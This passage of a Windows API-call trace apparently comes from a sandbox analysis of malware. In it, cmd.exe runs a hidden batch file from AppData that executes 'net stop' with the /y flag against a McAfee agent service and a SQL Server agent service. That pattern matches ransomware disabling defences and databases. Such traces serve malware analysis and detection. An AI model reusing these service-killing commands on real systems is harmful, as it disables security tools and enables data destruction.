[0037.546] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.546] GetProcessHeap () returned 0x3e0000 [0037.546] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f82b8 | out: hHeap=0x3e0000) returned 1 [0037.547] GetProcessHeap () returned 0x3e0000 [0037.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a70 [0037.547] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.547] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop macmnsvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop macmnsvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop macmnsvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb54, dwThreadId=0xb58)) returned 1 [0037.550] CloseHandle (hObject=0x74) returned 1 [0037.550] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.550] GetProcessHeap () returned 0x3e0000 [0037.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.550] GetEnvironmentStringsW () returned 0x3f8408* [0037.550] GetProcessHeap () returned 0x3e0000 [0037.550] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.550] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.550] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0037.681] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0037.681] CloseHandle (hObject=0x78) returned 1 [0037.681] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0037.681] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0037.681] GetProcessHeap () returned 0x3e0000 [0037.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.681] GetEnvironmentStringsW () returned 0x3f8408* [0037.681] GetProcessHeap () returned 0x3e0000 [0037.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.681] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.681] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.681] GetProcessHeap () returned 0x3e0000 [0037.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.681] GetEnvironmentStringsW () returned 0x3f8408* [0037.681] GetProcessHeap () returned 0x3e0000 [0037.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.681] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.681] GetProcessHeap () returned 0x3e0000 [0037.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0037.681] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0037.681] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.681] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0037.681] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.681] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0037.682] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.682] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0037.682] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.682] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0037.682] SetConsoleInputExeNameW () returned 0x1 [0037.682] GetConsoleOutputCP () returned 0x1b5 [0037.682] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0037.682] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0037.683] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0037.683] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.683] SetFilePointer (in: hFile=0x78, lDistanceToMove=1010, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f2 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7488 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7358 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7230 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0037.683] GetProcessHeap () returned 0x3e0000 [0037.683] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0037.683] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.683] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f2 [0037.684] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x14cf, lpOverlapped=0x0) returned 1 [0037.684] SetFilePointer (in: hFile=0x78, lDistanceToMove=1039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x40f [0037.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$ECWDB2 /y\r\ntrol ServiceΓÇ¥ /y\r\nfailures\r\nnded\r\n") returned 29 [0037.684] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.684] GetFileType (hFile=0x78) returned 0x1 [0037.684] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.684] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x40f [0037.684] GetProcessHeap () returned 0x3e0000 [0037.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0037.684] GetProcessHeap () returned 0x3e0000 [0037.684] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0037.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0037.684] GetProcessHeap () returned 0x3e0000 [0037.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0037.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3a) returned 0x3f3ff0 [0037.684] _tell (_FileHandle=3) returned 1039 [0037.684] _close (_FileHandle=3) returned 0 [0037.685] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0037.685] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0037.685] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0037.685] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0037.685] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0037.685] _wcsicmp (_String1="net", _String2="CD") returned 11 [0037.685] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0037.685] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0037.685] _wcsicmp (_String1="net", _String2="REN") returned -4 [0037.685] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0037.685] _wcsicmp (_String1="net", _String2="SET") returned -5 [0037.685] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0037.685] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0037.685] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0037.685] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0037.685] _wcsicmp (_String1="net", _String2="MD") returned 1 [0037.685] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0037.685] _wcsicmp (_String1="net", _String2="RD") returned -4 [0037.685] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0037.685] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0037.685] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0037.685] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0037.685] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0037.685] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0037.685] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0037.685] _wcsicmp (_String1="net", _String2="VER") returned -8 [0037.685] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0037.685] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0037.685] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0037.685] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0037.685] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0037.685] _wcsicmp (_String1="net", _String2="START") returned -5 [0037.686] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0037.686] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0037.686] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0037.686] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0037.686] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0037.686] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0037.686] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0037.686] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0037.686] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0037.686] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0037.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0037.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0037.686] SetErrorMode (uMode=0x0) returned 0x1 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0037.686] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0037.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0037.686] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.686] GetProcessHeap () returned 0x3e0000 [0037.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0037.687] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0037.687] GetProcessHeap () returned 0x3e0000 [0037.687] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0037.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.687] GetLastError () returned 0x2 [0037.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.687] GetLastError () returned 0x2 [0037.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.687] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.687] GetLastError () returned 0x2 [0037.688] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.688] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.688] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.688] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.688] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x42) returned 0x3f8278 [0037.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71c8 [0037.688] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d0, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0037.688] SetErrorMode (uMode=0x0) returned 0x1 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.688] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71c8, Size=0x5c) returned 0x3f71c8 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.688] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71c8) returned 0x5c [0037.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.688] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7230 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7358 [0037.688] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7358, Size=0x122) returned 0x3f7358 [0037.688] GetProcessHeap () returned 0x3e0000 [0037.689] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7358) returned 0x122 [0037.689] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.689] GetProcessHeap () returned 0x3e0000 [0037.689] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7488 [0037.689] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7488, Size=0x76) returned 0x3f7488 [0037.689] GetProcessHeap () returned 0x3e0000 [0037.689] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7488) returned 0x76 [0037.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.689] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.689] GetLastError () returned 0x2 [0037.689] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.689] GetLastError () returned 0x2 [0037.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.689] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.689] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.690] GetLastError () returned 0x2 [0037.690] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.690] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.690] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.690] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.690] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.690] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0037.690] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0037.690] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0037.690] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4038 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.690] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.691] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.691] GetProcessHeap () returned 0x3e0000 [0037.691] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4038 | out: hHeap=0x3e0000) returned 1 [0037.691] GetProcessHeap () returned 0x3e0000 [0037.691] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a70 [0037.691] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.691] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$ECWDB2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$ECWDB2 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb64, 